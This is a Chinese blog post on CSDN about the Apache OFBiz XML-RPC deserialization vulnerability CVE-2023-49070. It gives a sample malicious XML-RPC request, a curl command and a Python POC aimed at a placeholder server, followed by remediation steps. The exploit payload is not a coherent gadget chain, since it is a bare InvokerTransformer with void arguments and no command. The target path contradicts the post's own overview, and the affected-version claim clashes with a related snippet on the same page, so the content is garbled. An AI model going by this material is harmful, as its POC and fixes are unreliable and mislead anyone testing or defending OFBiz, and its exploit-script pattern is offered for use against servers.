Apache Ofbiz-xmlrpc-反序列化漏洞(CVE-2023-49070)

于 2024-07-12 09:00:00 发布
阅读量504 收藏 5
点赞数 4
分类专栏: 漏洞 文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46023525/article/details/140354615
版权

Apache Ofbiz-xmlrpc-反序列化漏洞(CVE-2023-49070)

1.漏洞概述及原理

Apache OFBiz XML-RPC 反序列化漏洞 是由于 Apache OFBiz 在处理 XML-RPC 请求时存在不安全的反序列化操作。攻击者可以绕过权限限制,访问/webtools/control/xmlrpc/接口触发反序列化。

2.影响范围

该漏洞主要影响使用了 XML-RPC(XML Remote Procedure Call)服务的 Apache OFBiz 版本。具体的受影响版本可以从官方公告中获取,但通常包括以下版本:

Apache OFBiz 版本 16.11.01 及之前版本

3.漏洞利用方式

  • 构造恶意 XML-RPC 请求:者需要构造一个恶意的 XML-RPC 请求。这个请求包含恶意的对象数据,这些数据在服务器反序列化时会触发恶意代码执行。
    简单的恶意 XML-RPC 请求示例:
<?xml version="1.0"?>
<methodCall>
    <methodName>doSomething</methodName>
    <params>
        <param>
            <value>
                <ex:org.apache.commons.collections4.functors.InvokerTransformer xmlns:ex="java:org.apache.commons.collections4.functors">
                    <iMethodName>execute</iMethodName>
                    <iParamTypes>
                        <java-array class="java.lang.Class" length="1">
                            <void/>
                        </java-array>
                    </iParamTypes>
                    <iArgs>
                        <java-array class="java.lang.Object" length="1">
                            <void/>
                        </java-array>
                    </iArgs>
                </ex:org.apache.commons.collections4.functors.InvokerTransformer>
            </value>
        </param>
    </params>
</methodCall>
  • 发送请求:将恶意请求发送到目标 Apache OFBiz 服务器上开放的 XML-RPC 服务接口。
curl -X POST http://xxx/xmlrpc -d @malicious-request.xml
  • 触发反序列化:服务器在处理该请求时,会对请求中的数据进行反序列化操作,从而触发恶意代码执行。

利用 Python 编写的简单 POC

import requests

# 目标服务器的 XML-RPC 端点
url = 'http://xxx/xmlrpc'

# 构造恶意的 XML-RPC 请求
request_data = '''<?xml version="1.0"?>
<methodCall>
    <methodName>doSomething</methodName>
    <params>
        <param>
            <value>
                <ex:org.apache.commons.collections4.functors.InvokerTransformer xmlns:ex="java:org.apache.commons.collections4.functors">
                    <iMethodName>execute</iMethodName>
                    <iParamTypes>
                        <java-array class="java.lang.Class" length="1">
                            <void/>
                        </java-array>
                    </iParamTypes>
                    <iArgs>
                        <java-array class="java.lang.Object" length="1">
                            <void/>
                        </java-array>
                    </iArgs>
                </ex:org.apache.commons.collections4.functors.InvokerTransformer>
            </value>
        </param>
    </params>
</methodCall>
'''

# 发送请求
response = requests.post(url, data=request_data, headers={'Content-Type': 'text/xml'})

# 输出响应
print(response.text)

4.漏洞解决方式

  1. 更新到最新版本:官方已经在后续版本中修复了该漏洞。用户应尽快将 Apache OFBiz 更新到最新的安全版本。
  2. 禁用不必要的服务:如果 XML-RPC 服务不必要,建议禁用此服务以减少攻击面。
  3. 应用补丁:如果无法立即更新到最新版本,可以应用官方发布的补丁。具体的补丁信息可以在官方安全公告中找到。
  4. 配置安全策略:配置应用的安全策略,确保反序列化操作只处理受信任的数据。 采用白名单机制,只允许反序列化特定类型的对象。

Linux示例

  • 确认受影响的 Apache OFBiz 版本
cd /path/to/ofbiz
./gradlew --version

(1)更新 Apache OFBiz
具体步骤如下:

  • 备份当前数据和配置:
tar -czvf ofbiz_backup_$(date +%F).tar.gz /path/to/ofbiz
  • 下载最新版本的 Apache OFBiz:
  • 访问 Apache OFBiz 下载页面,下载最新的稳定版本。
wget https://downloads.apache.org/ofbiz/apache-ofbiz-X.X.X.zip
unzip apache-ofbiz-X.X.X.zip
  • 停止当前运行的 OFBiz 实例:
cd /path/to/ofbiz
./gradlew ofbiz --stop
  • 替换旧版本:
mv /path/to/old_ofbiz /path/to/old_ofbiz_backup
mv apache-ofbiz-X.X.X /path/to/ofbiz
  • 恢复配置和数据:

如果有自定义的配置和数据,需要备份中恢复到新版本的相应目录。

  • 启动新的 OFBiz 实例:
cd /path/to/ofbiz
./gradlew ofbiz

(2)应用官方补丁
如果无法立即更新到最新版本,则可以应用官方发布的补丁。以下是应用补丁的步骤:

获取补丁文件:
访问 Apache 官方安全公告页面,获取对应版本的补丁文件。

  • 应用补丁:
cd /path/to/ofbiz
patch -p1 < /path/to/patchfile.patch
  • 重启 OFBiz 服务:
./gradlew ofbiz --stop
./gradlew ofbiz

(3)禁用 XML-RPC 服务
如果 XML-RPC 服务不必要,可以将其禁用以减少攻击面:

  • 编辑 OFBiz 配置文件:
  • 打开 framework/webapp/config/ofbiz-containers.xml 文件,找到 XML-RPC
    配置部分并注释掉:
<!--
<container name="xmlrpc-container" class="org.apache.ofbiz.webapp.control.XmlRpcController">
    <property name="port" value="8080"/>
</container>
-->
  • 重启 OFBiz 服务:
./gradlew ofbiz --stop
./gradlew ofbiz
看着博客敲代码
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache OFBiz漏洞 CVE-2023-49070 的前世今生
离别歌
12-08 1080
最新的Apache OFBiz XML-RPC 序列漏洞,讲讲它的前世今生。前世Apache OFBiz是一个开源的开发框架,它提供了一些预置的逻辑用于开发企业级的业务流程。早在2020年,Apache OFBiz就曾出现过一个序列漏洞CVE-2020-9496),问题出现在XML-RPC这个组件中。XML-RPC也是Apache基金会旗下的一个项目,但基本上在2010年前后就不更新了,...
APACHE OFBIZ XML-RPC 序列漏洞 (CVE-2020-9496) 的复现与分析
smellycat000的专栏
12-23 1299
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介相关的重点类和方法:org.apache.xmlrpc.parser.Serializabl...
Apache OFBiz XML-RPC远程代码执行漏洞(CVE-2023-49070)漏洞复现
qq_53733257的博客
12-11 1515
CVE-2023-49070 漏洞复现
CVE-2020-9496 Apache OFBiz XML-RPC序列漏洞复现
Shadow_DAI_990101的博客
08-23 2155
CVE-2020-9496 Apache OFBiz XML-RPC序列漏洞复现
CVE-2020-9496:Apache Ofbiz 序列漏洞分析
爱国小白帽
09-29 2082
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-092902 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-29 0x01 漏洞简述 2020年09月29日, 360CERT对Apache ofbiz组件的序列漏洞进行了分析,该漏洞编号为 CVE-2020-9496,漏洞等级:高危,漏洞评分:8.0。 Apache ofbiz 存在 序列漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc
Goby漏洞更新 | Apache OFBiz xmlrpc 序列漏洞 (CVE-2020-9496)
m0_46699477的博客
04-01 178
Apache OFBiz 是一套足够灵活的业务应用程序,可用于任何行业。通用体系结构允许开发人员轻松扩展或增强它以创建自定义功能。 Apache OFBiz xmlrpc 处理接口存在序列漏洞,攻击者可以通过发送精心构造的序列数据,在目标服务器上执行任意代码,执行系统命令或打入内存马,获取服务器权限。
漏洞复现--Apache Ofbiz XML-RPC RCE(CVE-2023-49070)
qq_53003652的博客
12-07 1682
近日,亚信安全CERT监控到Apache OFBiz发布更新公告,修复了Apache OFBiz中的一个未授权远程代码执行(CVE-2023-49070)。该漏洞源于Apache OFBiz中存在不再维护的XML-RPC组件。XML-RPC是一种远程过程调用协议,它支持应用程序之间通过XML进行通信。虽然XML-RPC曾经被广泛使用,但由于安全问题,它已被弃用。利用该漏洞攻击者可以在受影响的Apache OFBiz服务器上执行任意代码,而无需事先进行任何身份验证。
Goby漏洞更新 Apache OFBiz xmlrpc 序列漏洞 (CVE-2024-9496)_apache ofbiz xml-rpc序列漏洞
最新发布
2401_84247505的博客
04-17 320
Apache OFBiz xmlrpc 处理接口存在序列漏洞,攻击者可以通过发送精心构造的序列数据,在目标服务器上执行任意代码,执行系统命令或打入内存马,获取服务器权限。Apache OFBiz xmlrpc 处理接口存在序列漏洞,攻击者可以通过发送精心构造的序列数据,在目标服务器上执行任意代码,执行系统命令或打入内存马,获取服务器权限。T行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Apache OfBiz 序列命令执行漏洞CVE-2023-49070)
LJQClqjc的博客
12-13 565
Apache OFBiz 17.12.03版本及以前存在一处XMLRPC导致的序列漏洞,官方于后续的版本中对相关接口进行加固修复漏洞,但修复方法存在绕过问题(CVE-2023-49070),攻击者仍然可以利用序列漏洞在目标服务器中执行任意命令。
CVE-2021-26295 Apache OFBiz 序列漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 序列漏洞
CVE-2020-9496 ofbiz序列漏洞分析1
08-03
CVE-2020-9496 ofbiz序列漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
apache-ofbiz-13.07.02.zip
08-14
apache-ofbiz-13.07.02.zip
ofbiz:Apache OFBiz-主要开发已移至ofbiz-frameworks存储库
02-03
ApacheOFBiz:registered: 欢迎使用ApacheOFBiz:registered: ! 一个功能强大的顶级Apache软件项目。 OFBiz是用Java编写的企业资源计划(ERP)系统,并包含大量库,实体,服务和功能,以运行您的业务的各个方面。 ...
apache-ofbiz-16.11.02源码+ofbiz菜鸟笔记+Apache+OFBiz+开发初学者指南
09-14
apache-ofbiz-16.11.02.zip,ofbiz菜鸟笔记,Apache+OFBiz+开发初学者指南.chm
Microsoft Windows CredSSP 远程执行代码漏洞CVE-2018-0886
热门推荐
看着博客敲代码
04-16 3万+
Microsoft Windows CredSSP 远程执行代码漏洞 Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),17
SSL/TLS 服务器瞬时 Diffie-Hellman 公共密钥过弱【原理扫描】
看着博客敲代码
01-18 2万+
SSL/TLS 服务器瞬时 Diffie-Hellman 公共密钥过弱【原理扫描】 安全套接层(Secure Sockets Layer,SSL),一种安全协议,是网景公司(Netscape)在推出Web浏览器首版的同时提出的,目的是为网络通信提供安全及数据完整性。SSL在传输层对网络连接进行加密。传输层安全TLS(Transport Layer Security),IETF对SSL协议标准(RFC 2246)后的产物,与SSL 3.0差异很小。 当服务器SSL/TLS的瞬时Diffie-Hellman公
Nginx 安全漏洞
看着博客敲代码
12-22 1万+
Nginx 安全漏洞 漏洞引发的威胁: CVE-2021-23017 nginx存在安全漏洞,该漏洞源于一个离一错误在该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意代码。受影响版本:0.6.18-1.20.0 CVE-2019-9511,CVE-2019-9513,CVE-2019-9516 Nginx 1.9.51 至 16.0版本及1.17.2.版本中的HTTP/2实现中存在拒绝服务漏洞,攻击者以多个数据流请求特定资源上的大量数据,通过操纵窗口大小和流优先级,强迫服务器将数据排列在1字节的块中,
3389端口报SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】漏洞
看着博客敲代码
06-04 1万+
Windows安全扫描报出3389端口漏洞,这个端口是远程桌面端口,因此也不能关闭,采用增强SSL的方式解决,解决方法如下。 一、win+R运行,输入gpedit.msc进入本地计算机策略 二、本地计算机组策略——>计算机配置——>管理模板——>网络——>ssl配置设置 三、打开ssl密码套件顺序 四、点击已开启,把密码套件替换为下一步中的套件内容。 套件内容 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P521,TLS_ECDHE_RSA
CVE-2020-9496
08-31
CVE-2020-9496是Apache Ofbiz组件中的一个漏洞。根据引用和引用的内容,该漏洞被评级为高危,漏洞评分为8.0。这个漏洞的具体细节和复现可以参考引用中的文章。根据引用的内容,该漏洞是通过利用Apache Ofbiz中的XMLRPC RCE漏洞来实现的。具体的复现过程可以参考引用中提供的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CVE-2020-9496 Apache OFBiz XML-RPC序列漏洞复现](https://blog.csdn.net/Shadow_DAI_990101/article/details/126490894)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [CVE-2020-9496:Apache Ofbiz 序列漏洞分析](https://blog.csdn.net/weixin_45728976/article/details/108872281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看着博客敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值